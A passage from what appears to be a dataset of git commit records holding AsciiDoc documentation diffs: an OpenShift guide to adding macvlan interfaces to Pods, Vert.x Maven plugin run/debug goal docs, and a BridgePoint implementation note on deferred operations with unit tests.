will be stored. 
It is a custom extension of Kubernetes that\ndefines how networks are attached to Pods.\n<2> `name` maps to the annotation, which is used in the next step.\n<3> `config`: The CNI configuration is packaged in the `config` field.\n+\nThe configuration is specific to a plug-in, which enables `macvlan`. Note the\n`type` line in the CNI configuration portion. Aside from the IPAM (IP address\nmanagement) parameters for networking, in this example the `master` field must\nreference a network interface that resides on the node(s) hosting the Pod(s).\n\n. Run the following command to create the CR:\n+\n----\n$ oc create -f macvlan-conf.yaml\n----\n\n[NOTE]\n====\nThis example is based on a `macvlan` CNI plug-in. Note that in AWS environments,\nmacvlan traffic might be filtered and, therefore, might not reach the desired\ndestination.\n====\n\n== Managing the CRs for additional interfaces\n\nYou can manage the CRs for additional interfaces using the `oc` CLI.\n\nUse the following command to list the CRs for additional interfaces:\n\n----\n$ oc get network-attachment-definitions.k8s.cni.cncf.io\n----\n\nUse the following command to delete CRs for additional interfaces:\n\n----\n$ oc delete network-attachment-definitions.k8s.cni.cncf.io macvlan-conf\n----\n\n== Creating an annotated Pod that uses the CR\n\nTo create a Pod that uses the additional interface, use an annotation that\nrefers to the CR. Create a YAML file called `samplepod.yaml` for a Pod with the\nfollowing contents:\n\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\nmetadata:\n name: samplepod\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf <1>\nspec:\n containers:\n - name: samplepod\n command: [\"\/bin\/bash\", \"-c\", \"sleep 2000000000000\"]\n image: centos\/tools\n----\n\n<1> The `annotations` field contains `k8s.v1.cni.cncf.io\/networks:\nmacvlan-conf`, which correlates to the `name` field in the CR defined earlier.\n\nRun the following command to create the `samplepod` Pod:\n\n----\n$ oc create -f samplepod.yaml\n----\n\nTo verify that an additional network interface has been created and attached to\nthe Pod, use the following command to list the IPv4 address information:\n\n----\n$ oc exec -it samplepod -- ip -4 addr\n----\n\nThree interfaces are listed in the output:\n\n----\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000 <1>\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP link-netnsid 0 <2>\n inet 10.244.1.4\/24 scope global eth0\n valid_lft forever preferred_lft forever\n4: net1@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link-netnsid 0 <3>\n inet 192.168.1.203\/24 scope global net1\n valid_lft forever preferred_lft forever\n----\n\n<1> `lo`: A loopback interface.\n<2> `eth0`: The interface that connects to the cluster-wide default network.\n<3> `net1`: The new interface that you just created.\n\n=== Attaching multiple interfaces to a Pod\n\nTo attach more than one additional interface to a Pod, specify multiple names,\nin comma-delimited format, in the `annotations` field in the Pod definition.\n\nThe following `annotations` field in a Pod definition specifies different CRs\nfor the additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, tertiary-conf, quaternary-conf\n----\n\nThe following `annotations` field in a Pod definition specifies the same CR for\nthe additional 
interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, macvlan-conf\n----\n\n== Viewing the interface configuration in a running Pod\n\nAfter the Pod is running, you can review the configurations of the additional\ninterfaces created. To view the sample Pod from the earlier example, execute the\nfollowing command.\n\n----\n$ oc describe pod samplepod\n----\n\nThe `metadata` section of the output contains a list of annotations, which are\ndisplayed in JSON format:\n\n[source,yaml]\n----\nAnnotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf\n k8s.v1.cni.cncf.io\/networks-status:\n [{\n \"name\": \"openshift-sdn\", <1>\n \"ips\": [\n \"10.131.0.10\"\n ],\n \"default\": true,\n \"dns\": {}\n },{\n \"name\": \"macvlan-conf\",\n \"interface\": \"net1\", <2>\n \"ips\": [ <3>\n \"192.168.1.200\"\n ],\n \"mac\": \"72:00:53:b4:48:c4\", <4>\n \"dns\": {} <5>\n }]\n----\n\n<1> `name` refers to the custom resource name, `macvlan-conf`.\n<2> `interface` refers to the name of the interface in the Pod.\n<3> `ips` is a list of IP addresses as assigned to the Pod.\n<4> `mac` is the MAC address of the interface.\n<5> `dns` refers DNS for the interface.\n\nThe first annotation, `k8s.v1.cni.cncf.io\/networks: macvlan-conf`, refers to the\nCR created in the example. This annotation was specified in the Pod definition.\n\nThe second annotation is `k8s.v1.cni.cncf.io\/networks-status`. There are two\ninterfaces listed under `k8s.v1.cni.cncf.io\/networks-status`.\n\n* The first interface describes the interface for the default network,\n`openshift-sdn`. This interface is created as `eth0`. It is used for\ncommunications within the cluster.\n\n* The second interface is the additional interface that you created, `net1`. The\noutput above lists some key values that were configured when the interface was\ncreated, for example, the IP addresses that were assigned to the Pod.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/managing_multinetworking.adoc\n\n[id=\"multinetwork-creating-first-attachments-{context}\"]\n= Creating additional network interfaces\n\nAdditional interfaces for Pods are defined in CNI configurations that are stored\nas Custom Resources (CRs). These CRs can be created, listed, edited, and deleted\nusing the `oc` tool.\n\nThe procedure below configures a `macvlan` interface on a Pod. This\nconfiguration might not apply to all production environments, but you use the\nsame procedure for other CNI plug-ins.\n\n== Creating a CNI configuration for an additional interface as a CR\n\n[NOTE]\n====\nIf you want to attach an additional interface to a Pod, the CR that defines the\ninterface must be in the same project (namespace) as the Pod.\n====\n\n. Create a project to store CNI configurations as CRs and the Pods that will use\nthe CRs.\n+\n----\n$ oc new-project multinetwork-example\n----\n\n. Create the CR that will define an additional network interface. 
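If you prefer raw output over `oc describe`, the same annotations can also be fetched directly with a `jsonpath` query (a sketch; the exact output formatting varies by client version):\n\n----\n$ oc get pod samplepod -o jsonpath='{.metadata.annotations}'\n----\n\n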
Create a YAML\nfile called `macvlan-conf.yaml` with the following contents:\n+\n[source,yaml]\n----\napiVersion: \"k8s.cni.cncf.io\/v1\"\nkind: NetworkAttachmentDefinition <1>\nmetadata:\n name: macvlan-conf <2>\nspec:\n config: '{ <3>\n \"cniVersion\": \"0.3.0\",\n \"type\": \"macvlan\",\n \"master\": \"eth0\",\n \"mode\": \"bridge\",\n \"ipam\": {\n \"type\": \"host-local\",\n \"subnet\": \"192.168.1.0\/24\",\n \"rangeStart\": \"192.168.1.200\",\n \"rangeEnd\": \"192.168.1.216\",\n \"routes\": [\n { \"dst\": \"0.0.0.0\/0\" }\n ],\n \"gateway\": \"192.168.1.1\"\n }\n }'\n----\n+\n<1> `kind: NetworkAttachmentDefinition`. This is the name for the CR where this\nconfiguration will be stored. It is a custom extension of Kubernetes that\ndefines how networks are attached to Pods.\n<2> `name` maps to the annotation, which is used in the next step.\n<3> `config`: The CNI configuration is packaged in the `config` field.\n+\nThe configuration above is specific to a plug-in, which enables `macvlan`. Note\nthe `type` line in the CNI configuration portion. Aside from the IPAM (IP\naddress management) parameters for networking, in this example the `master`\nfield must reference a network interface that resides on the node(s) hosting the\nPod(s).\n\n. Run the following command to create the CR:\n+\n----\n$ oc create -f macvlan-conf.yaml\n----\n\n[NOTE]\n====\nThis example is based on a `macvlan` CNI plug-in. Note that in AWS environments,\nmacvlan traffic might be filtered and, therefore, might not reach the desired\ndestination.\n====\n\n== Managing the CRs for additional interfaces\n\nYou can manage the CRs for additional interfaces using the `oc` CLI.\n\nUse the following command to list the CRs for additional interfaces:\n\n----\n$ oc get network-attachment-definitions.k8s.cni.cncf.io\n----\n\nUse the following command to delete CRs for additional interfaces:\n\n----\n$ oc delete network-attachment-definitions.k8s.cni.cncf.io macvlan-conf\n----\n\n== Creating an annotated Pod that uses the CR\n\nTo create a Pod that uses the additional interface, use an annotation that\nrefers to the CR. 
Create a YAML file called `samplepod.yaml` for a Pod with the\nfollowing contents:\n\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\nmetadata:\n name: samplepod\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf <1>\nspec:\n containers:\n - name: samplepod\n command: [\"\/bin\/bash\", \"-c\", \"sleep 2000000000000\"]\n image: centos\/tools\n----\n\n<1> The `annotations` field contains `k8s.v1.cni.cncf.io\/networks:\nmacvlan-conf`, which correlates to the `name` field in the CR defined earlier.\n\nRun the following command to create the `samplepod` Pod:\n\n----\n$ oc create -f samplepod.yaml\n----\n\nTo verify that an additional network interface has been created and attached to\nthe Pod, use the following command to list the IPv4 address information:\n\n----\n$ oc exec -it samplepod -- ip -4 addr\n----\n\nThree interfaces are listed in the output:\n\n----\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000 <1>\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP link-netnsid 0 <2>\n inet 10.244.1.4\/24 scope global eth0\n valid_lft forever preferred_lft forever\n4: net1@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link-netnsid 0 <3>\n inet 192.168.1.203\/24 scope global net1\n valid_lft forever preferred_lft forever\n----\n\n<1> `lo`: A loopback interface.\n<2> `eth0`: The interface that connects to the cluster-wide default network.\n<3> `net1`: The new interface that you just created.\n\n=== Attaching multiple interfaces to a Pod\n\nTo attach more than one additional interface to a Pod, specify multiple names,\nin comma-delimited format, in the `annotations` field in the Pod definition.\n\nThe following `annotations` field in a Pod definition specifies different CRs\nfor the additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, tertiary-conf, quaternary-conf\n----\n\nThe following `annotations` field in a Pod definition specifies the same CR for\nthe additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, macvlan-conf\n----\n\n== Viewing the interface configuration in a running Pod\n\nAfter the Pod is running, you can review the configurations of the additional\ninterfaces created. To view the sample Pod from the earlier example, execute the\nfollowing command.\n\n----\n$ oc describe pod samplepod\n----\n\nThe `metadata` section of the output contains a list of annotations, which are\ndisplayed in JSON format:\n\n[source,yaml]\n----\nAnnotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf\n k8s.v1.cni.cncf.io\/networks-status:\n [{\n \"name\": \"openshift-sdn\", <1>\n \"ips\": [\n \"10.131.0.10\"\n ],\n \"default\": true,\n \"dns\": {}\n },{\n \"name\": \"macvlan-conf\",\n \"interface\": \"net1\", <2>\n \"ips\": [ <3>\n \"192.168.1.200\"\n ],\n \"mac\": \"72:00:53:b4:48:c4\", <4>\n \"dns\": {} <5>\n }]\n----\n\n<1> `name` refers to the custom resource name, `macvlan-conf`.\n<2> `interface` refers to the name of the interface in the Pod.\n<3> `ips` is a list of IP addresses as assigned to the Pod.\n<4> `mac` is the MAC address of the interface.\n<5> `dns` refers DNS for the interface.\n\nThe first annotation, `k8s.v1.cni.cncf.io\/networks: macvlan-conf`, refers to the\nCR created in the example. This annotation was specified in the Pod definition.\n\nThe second annotation is `k8s.v1.cni.cncf.io\/networks-status`. 
There are two\ninterfaces listed under `k8s.v1.cni.cncf.io\/networks-status`.\n\n* The first interface describes the interface for the default network,\n`openshift-sdn`. This interface is created as `eth0`. It is used for\ncommunications within the cluster.\n\n* The second interface is the additional interface that you created, `net1`. The\noutput above lists some key values that were configured when the interface was\ncreated, for example, the IP addresses that were assigned to the Pod.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23af40db649c658ad767f2a61f5a0f52ced8b389","subject":"Fix typo in doc","message":"Fix typo in doc\n","repos":"kameshsampath\/vertx-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/_vertx-run.adoc","new_file":"src\/main\/asciidoc\/inc\/_vertx-run.adoc","new_contents":"[[vertx:run]]\n== *vertx:run*\nThis goal allows you to run the Vert.x application as part of the Maven build.\nThe application is always run as a forked process.\n\nThe goal does not have any exclusive configuration; **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal.\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| redeploy\n| Whether or not the redeployment is enabled\n|  \n| false\n\n| redeployScanPeriod\n| The file system check period (in milliseconds)\n| vertx.redeploy.scan.period\n| 1000\n\n| redeployGracePeriod\n| The amount of time (in milliseconds) to wait between 2 re-deployments\n| vertx.redeploy.grace.period\n| 1000\n\n\n| redeployTerminationPeriod\n| the amount of time (in milliseconds) to wait after having stopped the application (before launching user command).\n This is useful on Windows, where the process is not killed immediately.\n| vertx.redeploy.termination.period\n| 0\n\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n|===\n\nWhen the redeployment is enabled, it replays the plugin configured between the _generate-source_ and\n_process-classes_ phases.\n\nSo to start a Vert.x application just launch:\n\n[source]\n----\nmvn vertx:run\n----\n\nIf the sources are not compiled, the plugin executes `mvn compile` for you.\n\n**IMPORTANT**: `vertx:run` starts the application in a forked JVM.\n\n[[vertx:debug]]\n== *vertx:debug*\nThis goal allows you to debug the Vert.x application.\n\nThe goal does not have any exclusive configuration; **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal.\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| config\n| The configuration file to use to configure the application. 
This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n\n| debugPort\n| The debugger port\n| debug.port\n| 5005\n\n| debugSuspend\n| Whether or not the application must wait until a debugger is attached to start\n| debug.suspend\n| false\n|===\n\n**IMPORTANT**: the redeploy mode and debug cannot be used together. When `vertx:debug` is launched, the redeployment\nmode is disabled.\n","old_contents":"[[vertx:run]]\n== *vertx:run*\nThis goal allows to run the Vert.x application as part of the maven build.\nThe application is always run as a forked process.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| redeploy\n| Whether or not the redeployment is enabled\n|  \n| false\n\n| redeployScanPeriod\n| The file system check period (in milliseconds)\n| vertx.redeploy.scan.period\n| 1000\n\n| redeployGracePeriod\n| The amount of time (in milliseconds) to wait between 2 re-deployments\n| vertx.redeploy.grace.period\n| 1000\n\n\n| redeployTerminationPeriod\n| the amount of time (in millisecods) to wait after having stopped the application (before launching user command).\n This is useful on Windows, where the process is not killed immediately.\n| vertx.redeploy.termination.period\n| 0\n\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n|===\n\nWhen the redeployment is enabled, it replays the plugin configured between the _generate-source_ and\n_process-classes_ phases.\n\nSo to start a Vert.x application just launch:\n\n[source]\n----\nmvn vertx:run\n----\n\nIf the sources are not compiled, the plugin executes `mvn compile` for you.\n\n**IMPORTANT**: `vertx:run` starts the application in a forked JVM.\n\n[[vertx:debug]]\n== *vertx:debug*\nThis goal allows to debug the Vert.x application.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n\n| debugPort\n| The debugger port\n| debug.port\n| 5005\n\n| debugSuspend\n| Whether or not the application must wait until a debugger is attached to start\n| debug.suspend\n| false\n|===\n\n**IMPORTANT**: the redeploy mode and debug cannot be used together. 
When `vertx:debug` is launched, the redeployment\nmode is disabled.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f34cce12e27719e3cc221cb169a465dd2817e7fc","subject":"job #11841 fix typo in note","message":"job #11841 fix typo in note\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11841_deferred_ops.adoc","new_file":"doc-bridgepoint\/notes\/11841_deferred_ops.adoc","new_contents":"= Support deferred operations in BridgePoint (part 1)\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nDeferred operations are supported in MASL and there is desire for them to be\nsupported by xtUML\/OAL. Additionally, the Ciera model compiler (which is\nitself an xtUML\/OAL model) uses them. Up to this point, they have been\nmaintained by hand, but this feature will give them official support within\nBridgePoint.\n\n== 2 Introduction and Background\n\nOriginal analysis note found at <<dr-1>>.\n\nCiera project found at <<dr-2>>.\n\n== 3 Requirements\n\nThese requirements are a modified subset of the requirements proposed in the\noriginal analysis note <<dr-1>>.\n\n3.1 BridgePoint shall supply a CME to mark an instance based operation as a deferred operation. +\n3.1.1 The option to mark an operation as a deferred operation shall be available only if the following conditions are met: +\n3.1.1.1 The operation is not already a deferred operation. +\n3.1.1.2 The operation is an instance based operation. +\n3.1.1.3 The class on which the operation is defined is participating as a supertype in at least one subsuper association. +\n3.1.2 BridgePoint shall allow the user to choose which subsuper association to defer the operation across. +\n3.1.2.1 BridgePoint shall only allow an operation to defer across one subsuper association at a given time. +\n3.1.3 BridgePoint shall allow the user to choose whether the deferral is \"required\" or \"optional\". +\n3.2 BridgePoint shall supply a CME to mark a deferred to operation as local (non-deferred). +\n3.2.1 The option to mark an operation as a local operation shall be available only if the operation is already marked as deferred. +\n3.3 Details of deferrals applied to operations shall be visible in the Properties view. 
+\n3.4 Ciera shall support deferred operation behavior. +\n3.4.1 If a deferred operation is invoked, the subtype of the current instance shall be selected and the operation on the subtype instance shall be invoked. +\n3.4.1.1 If there is no subtype instance related, Ciera shall throw an error. +\n3.4.1.2 If the deferred operation is marked \"optional\" and there is no deferred to operation in the subtype instance, the deferred operation itself shall be executed. +\n3.4.2 Deferred to operations shall be invocable directly. +\n3.4.3 Deferred operations which return values, have parameters, or use array types shall be supported. +\n\n== 4 Work Required\n\n4.1 Model deferral\n\n`O_DEF` was added to the Subsystem subsystem as shown in the BridgePoint diagram\nin the analysis note <<dr-1>>. Another attribute \"required\" was added to capture\nwhether or not the deferred operation requires each subtype to provide an\nimplementation.\n\n4.2 CMEs\n\n`MakeDeferred` and `MakeLocal` CMEs were introduced along with corresponding\noperations on `O_TFR` and an action filter (to determine when the CMEs are\nvisible). PEI data was updated for the new CMEs.\n\n4.3 Persistence\n\nThe new `O_DEF` class was added to the persistence tree PEI data as a child of\n`O_TFR`.\n\n4.4 Properties\n\nThe appropriate PEI data was updated to include deferrals in the properties view.\n\n4.5 OOA schema\n\nThe schema was updated to include `O_DEF`.\n\n== 5 Implementation Comments\n\n5.1 An MC-Java bug was fixed in the process. The bug was that enumerator values\nwere generated starting at 1 and not 0. This is not consistent with MC-3020 (and\nother model compiler tools), making it impossible to load BridgePoint data\nwith the MC-3020 SQL loader. The original bug report can be seen at <<dr-4>>.\n\n== 6 Unit Test\n\n6.0 Import the model attached to the issue <<dr-3>> into a new workspace.\n\n6.1 UI testing +\n6.1.1 Right click `op1`. Confirm that \"Make Deferred...\" CME is available. +\n6.1.2 Select \"Make Deferred...\", click Finish. Confirm that `op1` operations\nappeared in classes `B` and `C`. With `A::op1` selected, confirm that the\ndeferral is viewable in properties and that the value for \"Required\" is\n\"Required\". +\n6.1.3 Right click on `op2`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.4 Right click on `class_based_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.5 Right click on `subtype_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.6 Right click on `op_no_rel`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.7 Right click on `op3` and select \"Make Deferred...\". Confirm that the\ndropdown box for \"Relationship\" contains both `R2` and `R3`. Select `R3`,\nuncheck \"Required\", and click Finish. Navigate to the deferral in properties and\nconfirm that the value for \"Required\" is \"Optional\". +\n6.1.8 Right click on `E::op3` again and select \"Make Local\". Confirm that the\ndeferral disappears from the properties view. +\n6.1.9 Right click on `op_no_rel` again and confirm that the \"Make Local\"\nCME is _not_ available. +\n\n6.2 Ciera behavior test +\n6.2.1 Build the project by running `mvn install` in the project directory. +\nVerify that it builds cleanly with no errors (no \"FAIL\" tests). +\n6.2.2 Run the project by running `bash run.sh` in the project directory. Confirm\nthat all tests pass. +\n6.2.3 Uncomment lines 44 and 45 in `init`. Build and run again. Confirm that an\nerror is thrown and the program exits. 
The error should look something like the\nfollowing: +\n```\nNo subtype selected\nio.ciera.runtime.summit.exceptions.XtumlException: No subtype selected\n...\n```\n\n== 7 User Documentation\n\nEntries were added in the BridgePoint CME documentation for \"Make Deferred...\"\nand \"Make Local\".\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint +\n- branch: 11841_deferred_ops +\n\n----\n doc-bridgepoint\/notes\/10129_deferred_ops\/10129_deferred_ops_ant.md | 232 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/10129_deferred_ops\/model.png | Bin 0 -> 342704 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/op.png | Bin 0 -> 408085 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/paper_model.jpg | Bin 0 -> 2849802 bytes\n doc-bridgepoint\/notes\/11841_deferred_ops.adoc | 139 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/MC-Java\/enums.inc | 2 +-\n src\/MC-Java\/ooa_schema.sql | 7 +++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Functions\/Context Menu Entry Functions\/Context Menu Entry Functions.xtuml | 38 ++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Deferral\/Deferral.xtuml | 180 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Operation\/Operation.xtuml | 101 +++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Subsystem.xtuml | 406 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/sql\/context_menu.pei.sql | 4 ++\n src\/org.xtuml.bp.core\/sql\/ooaofooa_hierarchy.pei.sql | 3 ++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/inspector\/.gitignore | 1 +\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/.gitignore | 4 ++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 8 ++++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 2 +\n src\/org.xtuml.bp.io.mdl\/sql\/file_io.pei.sql | 3 +-\n src\/org.xtuml.bp.io.mdl\/sql\/stream.pei.sql | 3 +-\n 19 files changed, 1130 insertions(+), 3 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] link:10129_deferred_ops\/10129_deferred_ops_ant.md[Deferred operations analysis note]\n. [[dr-2]] https:\/\/github.com\/xtuml\/ciera\/[Ciera project homepage]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11841[Support deferred operations in BridgePoint (part 1)]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/10298[MC-Java generated enumerator values do not start from 0]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Support deferred operations in BridgePoint (part 1)\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nDeferred operations are supported in MASL and there is desire for them to be\nsupported by xtUML\/OAL. Additionally, the Ciera model compiler (which is\nitself an xtUML\/OAL model) uses them. 
Up to this point, they have been\nmaintained by hand, but this feature will give them official support within\nBridgePoint.\n\n== 2 Introduction and Background\n\nOriginal analysis note found at <<dr-1>>.\n\nCiera project found at <<dr-2>>.\n\n== 3 Requirements\n\nThese requirements are a modified subset of the requirements proposed in the\noriginal analysis note <<dr-1>>.\n\n3.1 BridgePoint shall supply a CME to mark an instance based operation as a deferred operation. +\n3.1.1 The option to mark an operation as a deferred operation shall be available only if the following conditions are met: +\n3.1.1.1 The operation is not already a deferred operation. +\n3.1.1.2 The operation is an instance based operation. +\n3.1.1.3 The class on which the operation is defined is participating as a supertype in at least one subsuper association. +\n3.1.2 BridgePoint shall allow the user to choose which supsuper association to defer the operation across. +\n3.1.2.1 BridgePoint shall only allow an operation to defer across one supsuper association at a given time. +\n3.1.3 BridgePoint shall allow the user to choose whether the deferral is \"required\" or \"optional\". +\n3.2 BridgePoint shall supply a CME to mark a deferred to operation as local (non-deferred). +\n3.2.1 The option to mark an operation as a local operation shall be available only if the operation is already marked as deferred. p\n3.3 Details of deferrals applied to operations shall be visible in the Properties view. +\n3.4 Ciera shall support deferred operation behavior. +\n3.4.1 If a deferred operation is invoked, the subtype of the current instance shall be selected and the operation on the subtype instance shall be invoked. +\n3.4.1.1 If there is no subtype instance related, Ciera shall throw an error. +\n3.4.1.2 If the deferred operation is marked \"optional\" and there is no deferred to operation in the subtype instance, the deferred operation itself shall be executed. +\n3.4.2 Deferred to operations shall be invocable directly. +\n3.4.3 Deferred operations which return values, have parameters, or use array types shall be supported. +\n\n== 4 Work Required\n\n4.1 Model deferral\n\n`O_DEF` was added to the Subsystem subsystem as shown in the BridgePoint diagram\nin the analysis note <<dr-1>>. Another attribute \"required\" was added to capture\nwhether or not the deferred operation requires each subtype to provide an\nimplementation.\n\n4.2 CMEs\n\n`MakeDeferred` and `MakeLocal` CMEs were introduced along with corresponding\noperations on `O_TFR` and action filter (to determine when the CMEs are\nvisible). PEI data was updated for the new CMEs.\n\n4.3 Persistence\n\nThe new `O_DEF` class was added to the persistence tree PEI data as a child of\n`O_TFR`.\n\n4.4 Properties\n\nThe appropriate PEI data was updated to include deferrals in the properties view\n\n4.5 OOA schema\n\nThe schema was updated to include `O_DEF`.\n\n== 5 Implementation Comments\n\n5.1 An MC-Java bug was fixed in the process. The bug was that enumerator values\nwere generated starting at 1 and not 0. This is not consistent with MC-3020 (and\nother model compiler tools), so it makes it impossible to load BridgePoint data\nwith the MC-3020 SQL loader. The original bug report can be seen at <<dr-4>>.\n\n== 6 Unit Test\n\n6.0 Import the model attached to the issue <<dr-3>> into a new workspace.\n\n6.1 UI testing +\n6.1.1 Right click `op1`. Confirm that \"Make Deferred...\" CME is available. +\n6.1.2 Select \"Make Deferred...\", click Finish. 
Confirm that `op1` operations\nappeared in classes `B` and `C`. With `A::op1` selected, confirm that the\ndeferral is viewable in properties and that the value for \"Required\" is\n\"Required\". +\n6.1.3 Right click on `op2`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.4 Right click on `class_based_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.5 Right click on `subtype_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.6 Right click on `op_no_rel`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.7 Right click on `op3` and select \"Make Deferred...\". Confirm that the\ndropdown box for \"Relationship\" contains both `R2` and `R3`. Select `R3`,\nuncheck \"Required\", and click Finish. Navigate to the deferral in properties and\nconfirm that the value for \"Required\" is \"Optional\". +\n6.1.8 Right click on `E::op3` again and select \"Make Local\". Confirm that the\ndeferral disappears from the properties view. +\n6.1.9 Right click on `op_no_rel` again and select confirm that the \"Make Local\"\nCME is _not_ available. +\n\n6.2 Ciera behavior test +\n6.2.1 Build the project by running `mvn install` 